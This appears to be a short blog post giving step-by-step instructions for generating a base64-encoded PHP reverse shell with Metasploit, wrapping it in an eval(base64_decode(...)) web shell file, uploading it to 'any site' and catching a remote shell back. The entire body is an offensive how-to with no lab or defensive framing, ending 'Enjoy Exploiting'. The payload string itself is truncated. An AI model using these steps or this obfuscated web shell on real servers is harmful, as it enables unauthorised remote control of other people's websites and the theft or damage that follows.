First You need your IP Address Ready Besure that it is External IP Address Not internal
And a Random Port
Make sure that the PORT is OPEN in your Router
Now Enter into Metasploit and type the following command
msf > use payload/php/reverse_php
msf payload(reverse_php) > set LHOST YOUR_IP_ADDRESS
LHOST => YOUR_IP_ADDRESS
msf payload(reverse_php) > set LPORT YOUR_PORT
LPORT => YOUR_PORT
msf payload(reverse_php) > set ENCODER php/base64
ENCODER => php/base64
msf payload(reverse_php) > generate -t raw
Once you have done with above command it generates a Shell code which is encoded with Base64
Now copy the whole Generated string into a php file like this
<?
eval(base64_decode("CQkkaXBhZGRyPWxvbmcya....."));
?>
Now save the file as something.php and upload the file onto any site and open in the url
example:
if you have uploaded the file as shell.php
now open the url http://somesite.com/shell.php
Now you would get a shell back at your Metasploit
Enjoy Exploiting :)
No comments:
Post a Comment
Note: only a member of this blog may post a comment.